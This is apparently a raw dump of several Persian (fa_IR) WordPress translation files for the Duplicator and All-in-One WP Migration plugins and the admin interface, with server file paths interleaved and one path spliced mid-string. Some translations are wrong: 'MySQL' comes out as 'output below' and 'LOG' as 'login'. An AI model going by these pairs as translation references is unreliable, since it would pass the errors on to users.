however they could cause issues on some systems.'=>'لازم نیست بررسی‌های اسکن با موفقیت انجام شوند، با این حال می‌توانند در برخی سیستم‌ها مشکلاتی ایجاد کنند.','Build Mode:'=>'حالت ساخت:','Host:'=>'میزبان:','Name:'=>'نام:','repair and optimization'=>'تعمیر و بهینه سازی','Records'=>'سوابق','Tables'=>'جداول','No file extension filters have been set.'=>'هیچ فیلتری برای پسوند فایل تنظیم نشده است.','Large Files'=>'فایل‌های بزرگ','Name Checks'=>'بررسی نام','Directory Count'=>'تعداد دایرکتوری','File Count'=>'تعداد فایل‌ها','Enabled'=>'فعال شده','Core Files'=>'فایل‌های اصلی','WordPress Version'=>'نسخه وردپرس','WordPress'=>'وردپرس','MySQL'=>'خروجی زیر','Note: Timeouts can also be set at the web server layer, so if the PHP max timeout passes and you still see a build timeout messages, then your web server could be killing the process. If you are on a budget host and limited on processing time, consider using the database or file filters to shrink the size of your overall Backup. However use caution as excluding the wrong resources can cause your install to not work properly.'=>'توجه: زمان‌بندی‌ها را می‌توان در لایه وب سرور نیز تنظیم کرد، بنابراین اگر حداکثر مهلت زمانی PHP بگذرد و همچنان پیام‌های مهلت زمانی ساخت را مشاهده کنید، سرور وب شما ممکن است روند را از بین ببرد. اگر از یک هاست مقرون به صرفه هستید و زمان پردازش محدودی دارید، از پایگاه داده یا فیلترهای فایل استفاده کنید تا اندازه کلی نسخه پشتیبان خود را کاهش دهید. با این حال احتیاط کنید زیرا حذف منابع اشتباه باعث می شود نصب شما به درستی کار نکند.','Max Execution Time'=>'حداکثر زمان اجرا','details'=>'جزئیات','Issues might occur when [open_basedir] is enabled. Work with your server admin to disable this value in the php.ini file if you’re having issues building a Backup.'=>'ممکن است هنگام فعال بودن [open_basedir] مشکلاتی رخ دهد. اگر در ساخت نسخه پشتیبان با مشکل مواجه شدید، با مدیر سرور خود مشورت کنید تا این مقدار را در فایل php.ini غیرفعال کند.','Supported web servers: '=>'وب سرورهای پشتیبانی شده: ','Web Server'=>'وب سرور','Scan Complete'=>'اسکن کامل شد','Please Wait...'=>'لطفا صبر کنید...','Scanning Site'=>'اسکن سایت','This will clear and reset all of the current Backup settings. Would you like to continue?'=>'این کار تمام تنظیمات پشتیبان‌گیری فعلی را پاک و بازنشانی می‌کند. آیا مایل به ادامه هستید؟','Next'=>'بعدی','Reset'=>'تنظیم مجدد','Host Port'=>'پورت میزبان','Host'=>'میزبان',' MySQL Server'=>' سرور MySQL','Checked tables will not be added to the database script. Excluding certain tables can possibly cause your site or plugins to not work correctly after install!'=>'جداول بررسی شده به اسکریپت پایگاه داده اضافه نمی شوند. حذف برخی جداول ممکن است باعث شود سایت یا افزونه های شما پس از نصب به درستی کار نکنند!','Exclude All'=>'همه را حذف کنید','Include All'=>'شامل همه','Enable Table Filters'=>'فیلترهای جدول را فعال کنید','Media'=>'رسانه','File Extensions'=>'پسوند فایل‌ها','cache'=>'حافظه نهان','root path'=>'مسیر ریشه','Directories'=>'دایرکتوری‌ها','Database'=>'پایگاه داده','Files'=>'فایل‌ها','Database filter enabled'=>'فیلتر پایگاه داده فعال شد','File filter enabled'=>'فیلتر فایل فعال شد','Local'=>'محلی','Default'=>'پیش‌فرض','Location'=>'مکان','Type'=>'نوع','Storage'=>'ذخیره‌سازی','Remove Files Now'=>'اکنون فایل‌ها را حذف کنید','Reserved Files'=>'فایل‌های رزرو شده','more info'=>'اطلاعات بیشتر','MySQLi Support'=>'پشتیبانی MySQLi','MySQL Version'=>'نسخه MySQL','Server Support'=>'پشتیبانی سرور','Required Paths'=>'مسیرهای مورد نیاز','Function'=>'عملکرد','Safe Mode Off'=>'حالت ایمن خاموش','Zip Archive Enabled'=>'بایگانی زیپ فعال شد','PHP Version'=>'نسخه پی اچ پی','PHP Support'=>'پشتیبانی پی اچ پی','System requirements must pass for the Duplicator to work properly. Click each link for details.'=>'الزامات سیستم باید برای اجرای صحیح افزونه تایید شوند. برای جزئیات روی هر لینک کلیک کنید.','Requirements:'=>'الزامات:','Build'=>'ساختن','Scan'=>'اسکن','Setup'=>'راه‌اندازی','Backup settings have been reset.'=>'تنظیمات پشتیبان‌گیری بازنشانی شدند.','LOG'=>'ورود به سیستم','DATABASE'=>'پایگاه داده','Are you sure you want to delete the selected Backup(s)?'=>'آیا مطمئن هستید که می‌خواهید نسخه پشتیبان(های) انتخاب شده را حذف کنید؟','The following links contain sensitive data. Share with caution!'=>'لینک‌های زیر حاوی اطلاعات حساس هستند. با احتیاط به اشتراک بگذارید!','Download Links'=>'لینک های دانلود','Total Size'=>'اندازه کل','Log'=>'ورود','Notes'=>'یادداشت‌ها','Hash'=>'هش','User'=>'کاربر','Version'=>'نسخه','Archive'=>'بایگانی','Installer'=>'نصب کننده','Name'=>'نام','Size'=>'اندازه','Created'=>'ایجاد شده','Details'=>'جزئیات','Create New'=>'ایجاد جدید','Apply'=>'اعمال کردن','Delete'=>'حذف','Delete selected backup(s)'=>'حذف پشتیبان(های) انتخاب شده','Bulk Actions'=>'اقدامات دسته جمعی','Help Support Duplicator'=>'پشتیبانی از دستگاه کپی','Get Support'=>'گرفتن پشتیبانی','Change Log'=>'لیست تغییرات','FAQs'=>'سوالات متداول','User Guide'=>'راهنما کاربر','Quick Start'=>'شروع سریع','Choose A Section'=>'انتخاب بخش','Complete Online Documentation'=>'مستندات کامل آنلاین','Knowledgebase'=>'دانشنامه','Migrating WordPress is a complex process and the logic to make all the magic happen smoothly may not work quickly with every site. With over 30,000 plugins and a very complex server eco-system some migrations may run into issues. This is why the Duplicator includes a detailed knowledgebase that can help with many common issues. Resources to additional support, approved hosting, and alternatives to fit your needs can be found below.'=>'مهاجرت وردپرس یک فرآیند پیچیده است و منطق انجام همه جادوها به آرامی ممکن است در هر سایتی به سرعت کار نکند. با بیش از 30000 افزونه و اکوسیستم سرور بسیار پیچیده، ممکن است برخی مهاجرت ها با مشکلاتی مواجه شوند. به همین دلیل است که داپلیکیتور شامل یک پایگاه دانش دقیق است که می تواند به بسیاری از مسائل رایج کمک کند. منابع پشتیبانی اضافی، میزبانی تایید شده، و جایگزین های متناسب با نیازهای شما را می توان در زیر یافت.','Customer Support'=>'پشتیبانی مشتری','Scheduled Backups'=>'پشتیبان‌گیری‌های زمان‌بندی‌شده','Migration Wizard'=>'ویزارد مهاجرت','Backup Files & Database'=>'پشتیبان‌گیری از فایل‌ها و پایگاه داده','Duplicator Pro'=>'تکثیر کننده حرفه ای','Spread the Word'=>'گسترش کلمه','Manage'=>'مدیریت','Tools'=>'ابزارها','Settings'=>'تنظیمات','Get Help'=>'کمک بگیرید','You do not have sufficient permissions to access this page.'=>'شما مجوز کافی برای دسترسی به این صفحه را ندارید.','Reserved Duplicator installation files have been detected in the root directory. Please delete these installation files to avoid security issues.'=>'فایل‌های نصب رزرو شده است داپلیکیتور در فهرست اصلی شناسایی شده‌اند. لطفاً برای جلوگیری از مشکلات امنیتی، این فایل های نصب را حذف کنید.']]; /home/filetir/public_html/wp-content/languages/plugins/all-in-one-wp-migration-fa_IR.l10n.php:return ['x-generator'=>'GlotPress/4.0.3','translation-revision-date'=>'2026-03-16 12:19:22+0000','plural-forms'=>'nplurals=1; plural=0;','project-id-version'=>'Plugins - All-in-One WP Migration and Backup - Stable (latest release)','language'=>'fa','messages'=>['Backup is encrypted. Please provide decryption password: '=>'پشتیبان گیری رمزگذاری شده است. لطفا رمز رمزگشایی را وارد کنید: ','Password-protect and encrypt backups'=>'پشتیبان گیری را با رمز عبور و رمزگذاری کنید','A password is required'=>'رمز عبور لازم است','The passwords do not match'=>'رمز عبورها یکسان نیستند','Repeat the password'=>'تکرار رمز عبور جدید','Submit'=>'ارسال','The backup is encrypted'=>'نسخه پشتیبان رمزگذاری شده است','List'=>'فهرست','Show backup content'=>'نمایش محتوای پشتیبان','Downloading is not possible because backups directory is not accessible.'=>'دانلود امکان پذیر نیست زیرا دایرکتوری پشتیبان گیری در دسترس نیست.','Reading...'=>'خواندن...','List the content of the backup'=>'محتوای پشتیبان را فهرست کنید','Error'=>'خطا','More'=>'بیشتر','You have %d backups'=>'شما %d نسخه پشتیبان دارید','You have %d backup'=>'%d پشتیبان دارید','Error: %s'=>'خطا: %s','Contact Support'=>'تماس با پشتیبانی','Translate'=>'ترجمه','I have enough disk space'=>'من فضای ذخیره‌سازی کافی دارم.','Refreshing backup list...'=>'تازه کردن فهرست پشتیبان...','To choose a file please go inside the link and click on the browse button.'=>'برای انتخاب یک پرونده لطفا به لینک بروید و بر روی دکمه مرور کلیک کنید.','Finish'=>'پایان','Drag & Drop a backup to import it'=>'کشیدن و رها کردن یک فایل پشتیان برای وارد نمودن آن','All-in-One WP Migration Command'=>'دستور افزونه تمام انتقال‌های وردپرس در یکجا ','Preparing to export...'=>'اماده‌سازی برای خروجی گرفتن...','Close'=>'بستن','Stop export'=>'توقف خروجی گرفتن','%s ago'=>'%s قبل','Continue'=>'ادامه','Stop import'=>'توقف وارد کردن','Proceed'=>'پیش رفتن','Please do not close this browser window or your import will fail'=>'لطفاً این صفحه مرورگر را نبندید! در صورت بستن فرآیند وارد کردن شما با شکست مواجه خواهد شد','Archiving database...
%d%% complete'=>'بایگانی کردن پایگاه‌داده...
%d%% انجام شده','Restoring database...
%d%% complete'=>'بازیابی پایگاه‌داده
%d%% انجام شده','Monthly'=>'ماهیانه','Weekly'=>'هفتگی','Preparing to import...'=>'آماده سازی برای وارد کردن...','Activating mu-plugins...'=>'فعال‌سازی mu-plugins...','Preparing blogs...'=>'اماده سازی بلاگ‌ها...','Check for updates'=>'بررسی بروزرسانی','Cancel'=>'لغو','Delete'=>'حذف','Download'=>'دانلود','Name'=>'نام','Export'=>'برون ریزی','Import'=>'درون ریزی','Backups'=>'پشتیبان گیری','Date'=>'تاریخ','Size'=>'اندازه','Restore'=>'بازگردانی','Send'=>'ارسال','Advanced options'=>'گزینه های پیشرفته','File'=>'فایل','Replace with'=>'جایگزین با','Add'=>'افزودن','Export Site'=>'برون ریزی سایت','Import From'=>'درون ریزی از','Leave Feedback'=>'ارائه بازخورد','Create backup'=>'ایجاد فایل پشتیبان',''=>'','in the database'=>'در پایگاه داده','https://servmask.com/'=>'https://servmask.com/','Once the file is successfully downloaded on your computer, you can import it to any of your WordPress sites.'=>'هنگامی که فایل به طور موفقیت آمیز در رایانه شما دانلود شد، می‌توانید آن را وارد هرکدام از سایت‌های وردپرس خود کنید. ','(click to expand)'=>'(برای باز شدن کلیک کنید)',''=>'<متنی-دیگر>','Press "Export" button and the site archive file will pop up in your browser.'=>'دکمه خروجی گرفتن را فشار دهید و فایل بایگانی سایت بر روی مرورگر شما نمایش داده خواهد شد. ','In the advanced settings section you can configure more precisely the way of exporting.'=>'شما می‌توانید با دقت بیشتری روش خروجی گرفتن را در قسمت تنظیمات پیشرفته تغییر دهید. ','Your site has been imported successfully!'=>'سایت شما با موفقیت وارد شد!','ServMask'=>'ServMask','Import Site'=>'درون‌ریزی سایت','Get multisite'=>'دریافت مولتی‌سایت','Enter a password'=>'رمز عبور را وارد کنید']]; /home/filetir/public_html/wp-content/languages/admin-fa_IR.l10n.php:','Block themes'=>'پوسته‌های بلوک','With a block theme, you can place and edit blocks without affecting your content by customizing or creating new templates.'=>'با پوستهٔ بلوک، می‌توانید با سفارشی‌سازی یا ساختن قالب‌های جدید، بلوک‌ها را بدون تأثیر بر محتوای خود قرار داده و ویرایش نمایید.','A block theme is a theme that uses blocks for all parts of a site including navigation menus, header, content, and site footer. These themes are built for the features that allow you to edit and customize all parts of your site.'=>'یک پوستهٔ بلوک پوسته‌ای است که از بلوک‌ها برای همهٔ بخش‌های یک سایت از جمله فهرست راهبری، سربرگ، محتوا و پابرگ سایت استفاده می‌نماید. این پوسته‌ها برای قابلیت‌هایی ساخته شده‌اند که به شما اجازه می‌دهند همهٔ بخش‌های سایتتان را ویرایش و سفارشی نمایید.','Recommended items are considered beneficial to your site, although not as important to prioritize as a critical issue. They may include improvements in areas such as security, performance, and user experience.'=>'موارد پیشنهادی به عنوان مفید برای سایت شما در نظر گرفته می‌شوند، هرچند که به‌اندازهٔ مسائل حیاتی اولویت ندارند. این موارد می‌توانند شامل بهبودهایی در زمینه‌هایی مانند امنیت، عملکرد و تجربهٔ کاربرى باشند.','Critical issues are items that may have a high impact on your site’s performance or security. Resolving these issues should be prioritized.'=>'مشکلات بحرانی مواردی هستند که ممکن است تأثیر زیادی بر عملکرد یا امنیت سایت شما داشته باشند و حل این مشکلات باید در اولویت قرار گیرد.','Configuration rules for %s:'=>'پیکربندی قوانین برای %s:','Customize permalink structure by selecting available tags'=>'سفارشی‌سازی ساختار پیوند یکتا با انتخاب برچسب‌های در دسترس','Select the permalink structure for your website. Including the %s tag makes links easy to understand, and can help your posts rank higher in search engines.'=>'ساختار پیوند یکتا را برای وب‌سایت خود انتخاب نمایید. گنجاندن تگ %s باعث می‌شود که درک لینک‌ها آسان شود و می‌تواند به رتبه‌بندی نوشته‌های شما در موتورهای جستجو کمک نماید.','%s removed from permalink structure'=>'%s از ساختار پیوند یکتا پاک شد','Site Health %s'=>'سلامت سایت %s','Theme Styles & Block Settings'=>'تنظیمات سبک‌های پوسته و بلوک','The minimum recommended version of PHP is %s.'=>'حداقل نگارش پیشنهادی PHP %s است.','PHP is one of the programming languages used to build WordPress. Newer versions of PHP receive regular security updates and may increase your site’s performance.'=>'PHP یکی از زبان‌های برنامه‌نویسی است که برای ساخت وردپرس استفاده می‌شود. نگارش‌های تازه‌تر PHP به روز رسانی‌های امنیتی منظم را دریافت می‌نمایند و ممکن است عملکرد سایت شما را افزایش دهند.','Your site is running on an outdated version of PHP (%s), which soon will not be supported by WordPress. Ensure that PHP is updated on your server as soon as possible. Otherwise you will not be able to upgrade WordPress.'=>'سایت شما با نگارش منسوخ PHP (%s) اجرا می‌شود که به زودی از سوی وردپرس پشتیبانی نمی‌شود. مطمئن شوید که PHP به زودی روی سرور شما به روز می‌شود. در غیر این صورت نمی‌توانید وردپرس را ارتقا دهید.','Your site is running on an outdated version of PHP (%s), which does not receive security updates and soon will not be supported by WordPress. Ensure that PHP is updated on your server as soon as possible. Otherwise you will not be able to upgrade WordPress.'=>'سایت شما با نگارش منسوخ PHP (%s) اجرا می‌شود که به‌روز رسانی امنیتی را دریافت نمی‌نماید و به زودی از سوی وردپرس پشتیبانی نمی‌شود. مطمئن شوید که PHP به زودی روی سرور شما به روز می‌شود. در غیر این صورت نمی‌توانید وردپرس را ارتقا دهید.','Persistent object cache'=>'آبجکت‌کش دائمی','Page cache'=>'کش برگه','You should use a persistent object cache'=>'شما باید از آبجکت‌کش دائمی استفاده نمایید','Your host appears to support the following object caching services: %s.'=>'به‌نظر می‌رسد که میزبان شما از خدمات زیر برای آبجکت‌کش پشتیبانی می‌نماید: %s.','Your hosting provider can tell you if a persistent object cache can be enabled on your site.'=>'ارائه‌دهندهٔ میزبانیتان می‌تواند به شما بگوید که آیا آبجکت‌کش دائمی می‌تواند در سایت شما فعال شود یا خیر.','A persistent object cache is not required'=>'آبجکت‌کش دائمی لازم نیست','Learn more about persistent object caching.'=>'دربارهٔ آبجکت‌کش دائمی بیشتر بدانید.','A persistent object cache makes your site’s database more efficient, resulting in faster load times because WordPress can retrieve your site’s content and settings much more quickly.'=>'آبجکت‌کش دائمی پایگاه‌دادهٔ سایت شما را کارآمدتر می‌نماید و در نتیجه زمان بارگذاری سریع‌تر می‌شود زیرا وردپرس می‌تواند محتوا و تنظیمات سایت شما را با سرعت بیشتری فراخوانی نماید.','A persistent object cache is being used'=>'یک کش شیء دائمی در حال استفاده است','A page cache plugin was not detected.'=>'یک افزونهٔ کش برگه شناسایی نشد.','A page cache plugin was detected.'=>'یک افزونه کش برگه شناسایی شد.','There was %d client caching response header detected:'=>'%d سربرگ پاسخ حافظهٔ پنهان کاربر شناسایی شد:','No client caching response headers were detected.'=>'هیچ سربرگ پاسخی در حافظه پنهان کاربر شناسایی نشد.','Median server response time was %1$s milliseconds. It should be less than the recommended %2$s milliseconds threshold.'=>'میانگین زمان پاسخ سرور %1$s میلی‌ثانیه بود. این مورد باید کمتر از آستانهٔ پیشنهاد شدهٔ %2$s میلی‌ثانیه باشد.','Median server response time was %1$s milliseconds. This is less than the recommended %2$s milliseconds threshold.'=>'میانگین زمان پاسخ سرور %1$s میلی‌ثانیه بود. این کمتر از آستانهٔ پیشنهاد شدهٔ %2$s میلی‌ثانیه است.','Server response time could not be determined. Verify that loopback requests are working.'=>'زمان پاسخگویی سرور نمی‌تواند تعیین شود. تأیید کنید که درخواست‌های برگشتی کار می‌نمایند.','Page cache is detected but the server response time is still slow'=>'کش برگه شناسایی شد اما زمان پاسخ سرور کماکان کند است','Page cache is not detected and the server response time is slow'=>'کش برگه شناسایی نشد و زمان پاسخ سرور کند است','Page cache is detected and the server response time is good'=>'کش برگه شناسایی شد و زمان پاسخ سرور خوب است','Page cache is not detected but the server response time is OK'=>'کش برگه شناسایی نشد اما زمان پاسخ سرور خوب است','Unable to detect page cache due to possible loopback request problem. Please verify that the loopback request test is passing. Error: %1$s (Code: %2$s)'=>'ٰبه دلیل مشکل احتمالی درخواست حلقهٔ برگشتی، حافظهٔ پنهان برگه شناسایی نشد. لطفاً بررسی نمایید که آزمایش درخواست حلقهٔ برگشتی در حال عبور است. خطا: %1$s (کد: %2$s)','Unable to detect the presence of page cache'=>'قادر به تشخیص وجود حافظهٔ پنهان برگه نیست','Learn more about page cache'=>'درباره کش برگه بیشتر بدانید','Page cache is detected by looking for an active page cache plugin as well as making three requests to the homepage and looking for one or more of the following HTTP client caching response headers:'=>'حافظهٔ پنهان برگه با جستجوی یک افزونه فعال کش برگه و همچنین فرستادن سه درخواست به صفحهٔ اصلی و جستجوی یک یا چند مورد از سربرگ‌های پاسخ ذخیرهٔ کاربر HTTP زیر شناسایی می‌شود:','Page cache enhances the speed and performance of your site by saving and serving static pages instead of calling for a page every time a user visits.'=>'کش برگه سرعت و عملکرد سایتتان را با ذخیره و ارائهٔ برگه‌های ثابت به جای فراخوانی برای یک برگه در هر بار بازدید کاربر افزایش می‌دهد.','If you are still seeing this warning after having tried the actions below, you may need to contact your hosting provider for further assistance.'=>'اگر پس از انجام اقدامات زیر کماکان این هشدار را مشاهده می‌نمایید، ممکن است لازم باشد با ارائه‌دهندهٔ میزبانی خود برای راهنمایی بیشتر تماس بگیرید.','The Authorization header is used by third-party applications you have approved for this site. Without this header, those apps cannot connect to your site.'=>'سربرگ مجوز از برنامه‌های ثالث که شما تأیید نموده‌اید می‌آیند. بدون این سربرگ، آن برنامه‌ها نمی‌توانند به سایتتان وصل شوند.','When testing the REST API, an unexpected result was returned:'=>'هنگام آزمایش REST API، یک نتیجهٔ غیر منتظره برگردانده شد:','REST API Response: (%1$s) %2$s'=>'پاسخ REST API: (%1$s) %2$s','REST API Endpoint: %s'=>'نقطهٔ پایان REST API: %s','When testing the REST API, an error was encountered:'=>'هنگام آزمایش REST API، با یک خطا روبرو شد:','Your site is running on an outdated version of PHP (%s), which does not receive security updates. It should be updated.'=>'سایت شما روی نگارش منسوخ PHP (%s) اجرا می‌شود که به‌روزرسانی‌های امنیتی را دریافت نمی‌نماید. باید به‌روز شود.','Your site is running on an outdated version of PHP (%s), which does not receive security updates and soon will not be supported by WordPress.'=>'سایت شما روی نگارش منسوخ PHP (%s) اجرا می‌شود که به‌روزرسانی‌های امنیتی را دریافت نمی‌نماید و به زودی وردپرس از آن پشتیبانی نخواهد نمود.','Requirements'=>'نیازمندی‌ها','Your site is running on an outdated version of PHP (%s), which soon will not be supported by WordPress.'=>'سایت شما در حال اجرا روی یک نگارش منسوخ PHP (%s) است، که به زودی وردپرس از آن پشتیبانی نخواهد نمود.','Your site does not have any installed themes.'=>'سایت شما هیچ پوستهٔ نصب شده‌ای ندارد.','Your site does not have any active plugins.'=>'سایت شما هیچ افزونهٔ فعالی ندارد.','Another attempt will be made with the next release.'=>'تلاش دیگری با انتشار بعدی انجام خواهد شد.','The %1$s constant is defined as %2$s'=>'ثابت %1$s به عنوان %2$s تعریف شده است','The %1$s argument must be a non-empty string for %2$s.'=>'The %1$s argument must be a non-empty string for %2$s.','The %s argument must be an array.'=>'The %s argument must be an array.','- %1$s version %2$s%3$s'=>'- %1$s نگارش %2$s%3$s','- %1$s (from version %2$s to %3$s)%4$s'=>'- %1$s (از نگارش %2$s به %3$s)%4$s','Reach out to WordPress Core developers to ensure you\'ll never have this problem again.'=>'با توسعه‌دهندگان هستهٔ وردپرس تماس بگیرید تا مطمئن شوید دیگر هرگز با این مشکل روبرو نخواهید شد.','Important! Your version of WordPress (%1$s) will stop receiving security updates in the near future. To keep your site secure, please update to the latest version of WordPress.'=>'مهم! نگارش وردپرس شما (%1$s) در آیندهٔ نزدیک به‌روزرسانی‌های امنیتی را دریافت نخواهد کرد. برای ایمن نگه داشتن سایتتان، لطفاً به تازه‌ترین نگارش وردپرس به‌روزرسانی نمایید.','Important! Your version of WordPress (%1$s) is no longer supported, you will not receive any security updates for your website. To keep your site secure, please update to the latest version of WordPress.'=>'مهم! نگارش وردپرس شما (%1$s) دیگر پشتیبانی نمی‌شود، شما هیچ به‌روزرسانی امنیتی برای وب‌سایتتان دریافت نخواهید کرد. برای ایمن نگه داشتن سایتتان، لطفاً به تازه‌ترین نگارش وردپرس به‌روزرسانی نمایید.','https://make.wordpress.org/core/wordpress-%s-field-guide/'=>'https://make.wordpress.org/core/wordpress-%s-field-guide/','Learn more about WordPress %s'=>'درباره وردپرس %s بیشتر بدانید','Please type your comment text.'=>'لطفاً متن دیدگاهتان را بنویسید.','You cannot remove users.'=>'شما نمی‌توانید کاربران را حذف نمایید.','Application passwords grant access to the %2$s site on the network as you have Super Admin rights.'=>'از آنجایی که شما دسترسی مدیر کل %2$s را دارید رمزهای عبور برنامه به سایت در شبکه دسترسی می‌دهند.','WordPress has been updated! Next and final step is to update your database to the newest version.'=>'وردپرس به‌روزرسانی شد! قدم بعدی و نهایی به‌روزرسانی پایگاه دادهٔ شما به جدیدترین نگارش است.','Documentation on Managing Themes'=>'مستندات مدیریت پوسته‌ها','This information is being used to create a %s file.'=>'این اطلاعات برای ایجاد یک پروندهٔ %s استفاده می‌شود.','Welcome to WordPress. Before getting started, you will need to know the following items.'=>'به وردپرس خوش آمدید. پیش از این که آغاز کنید، لازم است که موارد زیر را بدانید.','Settings save failed.'=>'ذخیرهٔ تنظیمات ناموفق بود.','After your Privacy Policy page is set, you should edit it.'=>'پس از تنظیم برگهٔ حریم خصوصی، شما باید آن را ویرایش نمایید.','Error: Your %1$s file is not writable, so updating it automatically was not possible. These are the mod_rewrite rules you should have in your %1$s file. Click in the field and press %3$s (or %4$s on Mac) to select all.'=>'خطا: پروندهٔ %1$s شما قابل نوشتن نیست. بنابراین به‌روزرسانی خودکار ممکن نیست. این‌ها قوانین mod_rewrite هستند که باید در پروندهٔ %1$s باشند. روی کادر کلیک کنید و %3$s (یا %4$s در مک) را فشار دهید تا همه را انتخاب نمایید.','Error: Your %1$s file is not writable, so updating it automatically was not possible. This is the URL rewrite rule you should have in your %1$s file. Click in the field and press %3$s (or %4$s on Mac) to select all. Then insert this rule inside of the %5$s element in %1$s file.'=>'خطا: پروندهٔ %1$s شما قابل نوشتن، نیست. بنابراین به‌روزرسانی خودکار ممکن نیست. این قانون بازنویسی URL است که باید در پروندهٔ %1$s خود داشته باشید. روی کادر کلیک کنید و %3$s (یا %4$s در مک) را فشار دهید تا همه را انتخاب نمایید. سپس این قانون را درون عنصر %5$s در پروندهٔ %1$s درج نمایید.','An avatar is an image that can be associated with a user across multiple websites. In this area, you can choose to display avatars of users who interact with the site.'=>'نیم‌رخ تصویری است که می‌تواند به یک کاربر در چندین وب‌سایت مرتبط باشد. در این قسمت می‌توانید انتخاب نمایید که نیم‌رخ‌های کاربرانی که با سایت در تعامل هستند نمایش داده شود.','Change Permalink Structure'=>'تغییر ساختار پیوند یکتا','Howdy, /home/filetir/public_html/wp-content/languages/admin-fa_IR.l10n.php:###SITEURL###','Where your data is sent'=>'داده‌هایتان کجا فرستاده شد','Copy “%s” URL to clipboard'=>'کپی “%s” نشانی اینترنتی در کلیپ‌بورد','Some data that describes the error your site encountered has been put together.'=>'برخی از داده‌هایی که خطای سایت شما را شرح می‌دهند، جمع‌آوری شده است.','An attempt was made, but your site could not be updated automatically.'=>'تلاش صورت گرفت، اما سایت شما به طور خودکار به‌روزرسانی نشد.','The update cannot be installed because some files could not be copied. This is usually due to inconsistent file permissions.'=>'به‌روزرسانی نمی‌تواند نصب شود زیرا برخی از پرونده‌ها کپی نمی‌شوند. این معمولاً به دلیل ناسازگاری مجوزهای پرونده است.','Media — A list of URLs for media files the user uploads.'=>'رسانه — فهرستی از نشانی‌های اینترنتی برای پرونده‌های رسانه‌ای که کاربر بارگذاری می‌نماید.','Community Events Location — The IP Address of the user, which populates the Upcoming Community Events dashboard widget with relevant information.'=>'مکان رویدادهای انجمن — نشانی ip کاربر که ابزارک رویدادهای آیندهٔ انجمن را با اطلاعات مرتبط پر می‌نمایند.','WordPress collects (but never publishes) a limited amount of data from registered users who have logged in to the site. Generally, these users are people who contribute to the site in some way -- content, store management, and so on. With rare exceptions, these users do not include occasional visitors who might have registered to comment on articles or buy products. The data WordPress retains can include:'=>'وردپرس مقدار محدودی از داده‌های کاربران ثبت‌نام شده را که وارد سایت می‌شوند جمع‌آوری می‌نماید (اما هرگز منتشر نمی‌نماید). به طور کلی، این کاربران افرادی هستند که به صورتی به سایت کمک می‌کنند - محتوا، مدیریت فروشگاه و غیره. به استثنای موارد نادر، این کاربران شامل بازدیدکنندگان نمی‌شود که ممکن است برای نوشتن دیدگاه دربارهٔ نوشته‌ها یا خرید کالاها ثبت‌نام کرده باشند. داده‌هایی که وردپرس ذخیره می‌نماید می‌تواند شامل موارد زیر باشد:','Note: Since this tool only gathers data from WordPress and participating plugins, you may need to do more to comply with export requests. For example, you should also send the requester some of the data collected from or stored with the 3rd party services your organization uses.'=>'توجه: از آنجایی که این ابزار فقط داده‌ها را از وردپرس و افزونه‌های شرکت‌کننده جمع‌آوری می‌نماید، شاید لازم باشد که برای مطابقت با درخواست‌های برون‌ریزی، کارهای بیشتری انجام دهید. برای نمونه، شما باید برخی از داده‌های جمع‌آوری‌شده یا ذخیره شده با خدمات شخص ثالثی را که سازمانتان استفاده می‌نماید، برای درخواست‌کننده بفرستید.','Privacy Laws around the world require businesses and online services to provide an export of some of the data they collect about an individual, and to deliver that export on request. The rights those laws enshrine are sometimes called the "Right of Data Portability". It allows individuals to obtain and reuse their personal data for their own purposes across different services. It allows them to move, copy or transfer personal data easily from one IT environment to another.'=>'قوانین حفظ حریم خصوصی در سراسر جهان، کسب‌وکارها و خدمات آنلاین را اجبار می‌کند تا از برخی داده‌هایی که دربارهٔ افراد جمع‌آوری می‌نمایند، خروجی بگیرند و در صورت درخواست، آن خروجی را تحویل دهند. حقوقی که در این قوانین در نظر گرفته‌اند گاهی "حق انتقال داده" نامیده می‌شود. این به افراد اجازه می‌دهد تا داده‌های شخصیشان را برای اهدافشان در سرویس‌های مختلف به دست آورند و دوباره از آنها استفاده نمایند. این به آنها اجازه می‌دهد تا داده‌های شخصی را به سادگی از یک محیط IT به محیط دیگر انتقال دهند.','Comments — WordPress does not delete comments. The software does anonymize (but, again, never publishes) the associated Email Address, IP Address, and User Agent (Browser/OS).'=>'دیدگاه‌ها — وردپرس دیدگاه‌ها را حذف نمی‌نماید. این نرم افزار نشانی ایمیل مرتبط، نشانی IP و عامل کاربر (مرورگر/سیستم عامل) را ناشناس می‌نماید (اما باز هم هرگز منتشر نمی‌نماید).','WordPress collects (but never publishes) a limited amount of data from logged-in users but then deletes it or anonymizes it. That data can include:'=>'وردپرس مقدار محدودی از داده‌های کاربرانی که وارد سیستم شده‌اند را جمع‌آوری می‌نماید (اما هرگز منتشر نمی‌نماید) و سپس آن‌ها را حذف یا ناشناس می‌نماید. این داده‌ها می‌تواند شامل موارد زیر باشد:','Note: As this tool only gathers data from WordPress and participating plugins, you may need to do more to comply with erasure requests. For example, you are also responsible for ensuring that data collected by or stored with the 3rd party services your organization uses gets deleted.'=>'توجه: از آنجایی که این ابزار فقط داده‌ها را از وردپرس و افزونه‌های شرکت‌کننده جمع‌آوری می‌نماید، شاید لازم باشد برای مطابقت با درخواست‌های پاکسازی، کارهای بیشتری انجام دهید. برای نمونه، شما وظیفهٔ اطمینان از حذف داده‌های جمع‌آوری‌شده یا ذخیره‌شده با سرویس‌های شخص ثالثی که سازمانتان از آن استفاده می‌نماید را بر عهده دارید.','Privacy Laws around the world require businesses and online services to delete, anonymize, or forget the data they collect about an individual. The rights those laws enshrine are sometimes called the "Right to be Forgotten".'=>'قوانین حفظ حریم خصوصی در سراسر جهان، کسب‌وکارها و خدمات آنلاین را ملزم می‌کند تا داده‌هایی که دربارهٔ افراد جمع‌آوری می‌کنند، حذف، ناشناس یا فراموش کنند. حقوقی که این قوانین در نظر گرفته‌اند گاهی "حق فراموشی" نامیده می‌شود.','This screen is where you manage requests to erase personal data.'=>'این صفحه جایی است که شما درخواست‌های حذف داده‌های شخصیتان را مدیریت می‌نمایید.','This post is being backed up in your browser, just in case.'=>'این نوشته در مرورگر شما فقط در این حالت، پشتیبان‌گیری می‌شود.','This will grant access to the %2$s site on the network as you have Super Admin rights.'=>'این امکان به‌شما اجازهٔ دسترسی به سایت(های) %2$s در شبکه را می‌دهد، زیرا دارای دسترسی مدیرکل هستید.','Learn about block themes'=>'درباره پوسته‌های بلوکی بیاموزید','There is a new kind of WordPress theme, called a block theme, that lets you build the site you’ve always wanted — with blocks and styles.'=>'نوع جدیدی از پوسته وردپرس وجود دارد، که به آن پوسته بلوک می‌گویند، آن به شما امکان می‌دهد سایتی را که همیشه 